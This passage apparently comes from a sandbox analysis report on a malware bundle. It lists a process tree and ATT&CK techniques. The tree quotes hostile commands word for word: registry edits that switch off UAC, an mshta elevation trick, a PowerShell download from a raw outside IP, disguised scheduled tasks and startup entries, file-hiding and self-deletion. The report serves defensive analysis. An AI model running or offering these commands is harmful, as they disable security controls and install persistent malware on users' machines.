    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:4260
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Checks computer location settings
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3960
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Client-built.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Client-built.exe"
      4⤵
      Executes dropped EXE
      PID:428
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\pornhub_downloader.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\pornhub_downloader.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4468
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\565.tmp\566.tmp\567.bat C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\pornhub_downloader.exe"
        5⤵
        
        PID:2024
      - C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\7ZO8A2~3\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
        6⤵
        Checks computer location settings
        Access Token Manipulation: Create Process with Token
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Temp\7ZO8A2~3\Files\PORNHU~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\7ZO8A2~3\Files\PORNHU~1.EXE" goto :target
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5924
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1C77.tmp\1C78.tmp\1C79.bat C:\Users\Admin\AppData\Local\Temp\7ZO8A2~3\Files\PORNHU~1.EXE goto :target"
        8⤵
        
        PID:5996
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        9⤵
        UAC bypass
        
        PID:6068
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        9⤵
        UAC bypass
        
        PID:6092
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        9⤵
        UAC bypass
        
        PID:164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        9⤵
        
        PID:5580
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        10⤵
        
        PID:5628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        9⤵
        
        PID:6932
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ff99e1246f8,0x7ff99e124708,0x7ff99e124718
        10⤵
        
        PID:6960
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
        10⤵
        
        PID:8812
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
        10⤵
        
        PID:8820
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
        10⤵
        
        PID:8828
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
        10⤵
        
        PID:8868
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
        10⤵
        
        PID:8876
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
        10⤵
        
        PID:6992
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8000
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\random.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\random.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:5216
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\khtoawdltrha.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\khtoawdltrha.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:5540
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\NoEscape.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\NoEscape.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:5724
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Bloxflip%20Predictor.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Bloxflip%20Predictor.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:5792
    - - C:\Windows\Bloxflip Predictor.exe
        
        "C:\Windows\Bloxflip Predictor.exe"
        5⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        
        PID:6380
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +r +s "C:\Windows\Bloxflip Predictor.exe"
        5⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:6408
- - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\New Text Document mod.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4580
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\random.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\random.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2464
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1920
      - C:\Windows\system32\mode.com
        
        mode 65,10
        6⤵
        
        PID:4288
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p24291711423417250691697322505 -oextracted
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:992
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1788
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:4976
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:4576
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:652
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:4504
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2532
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2548
      - C:\Windows\system32\attrib.exe
        
        attrib +H "in.exe"
        6⤵
        Views/modifies file attributes
        
        PID:4788
      - C:\Users\Admin\AppData\Local\Temp\main\in.exe
        
        "in.exe"
        6⤵
        Executes dropped EXE
        
        PID:1376
        
        C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        7⤵
        Views/modifies file attributes
        
        PID:3824
        
        C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        7⤵
        Views/modifies file attributes
        
        PID:668
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell ping 127.0.0.1; del in.exe
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1452
        
        C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3636
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\client.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\l4.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\l4.exe"
      4⤵
      Executes dropped EXE
      PID:3944
    - - C:\Users\Admin\AppData\Local\Temp\onefile_3944_133785010779390916\l4.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\l4.exe
        5⤵
        Drops startup file
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3272
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\W4KLQf7.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\W4KLQf7.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4484
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2932
    - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe"
        5⤵
        Executes dropped EXE
        
        PID:4828
    - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe"
        5⤵
        
        PID:4404
    - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:916
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\AzVRM7c.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\AzVRM7c.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Program Files directory
      PID:2460
    - - C:\Program Files\Windows Media Player\graph\graph.exe
        
        "C:\Program Files\Windows Media Player\graph\graph.exe"
        5⤵
        Executes dropped EXE
        
        PID:600
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\Z9Pp9pM.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\Z9Pp9pM.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3924
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\C1J7SVw.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\C1J7SVw.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4908
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        5⤵
        
        PID:6808
      - C:\Windows\system32\mode.com
        
        mode 65,10
        6⤵
        
        PID:2864
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p24291711423417250691697322505 -oextracted
        6⤵
        
        PID:7820
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        6⤵
        
        PID:8760
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:5600
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\5F3EKF3EUA1N" & exit
        5⤵
        
        PID:7976
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        Delays execution with timeout.exe
        
        PID:7344
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\Dynpvoy.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\Dynpvoy.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6084
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:6172
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5328
      - C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo
        6⤵
        System Location Discovery: System Language Discovery
        Gathers system information
        
        PID:6544
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\networkmanager.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\networkmanager.exe"
      4⤵
      PID:5500
  - - C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\9feskIx.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\9feskIx.exe"
      4⤵
      PID:5592
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url" & echo URL="C:\Users\Admin\AppData\Local\AudioSync Innovations\TranscribeX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:3428
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1976
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:3080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5208
- C:\Users\Admin\Desktop\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1044
- - C:\Users\Admin\Desktop\Downloaders\4363463463464363463463463\Files\T3.exe
    "C:\Users\Admin\Desktop\Downloaders\4363463463464363463463463\Files\T3.exe"
    3⤵
    PID:6700
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:7008
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:5216
- C:\Users\Admin\Desktop\Downloaders\New Text Document mod.exse\New Text Document mod.exe
  "C:\Users\Admin\Desktop\Downloaders\New Text Document mod.exse\New Text Document mod.exe"
  2⤵
  PID:7700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "updateru" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\updater.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "updater" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\updater.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "updateru" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\AppData\Local\updater.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4464

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:1372

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4944
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:2704
- - C:\Windows\system32\PING.EXE
    "C:\Windows\system32\PING.EXE" 127.1.10.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1696

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4340

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5456

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
1⤵
PID:6568

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
1⤵
PID:6576

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:9180

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7780

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa387d855 /state1:0x41c64e6d
1⤵
PID:7372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion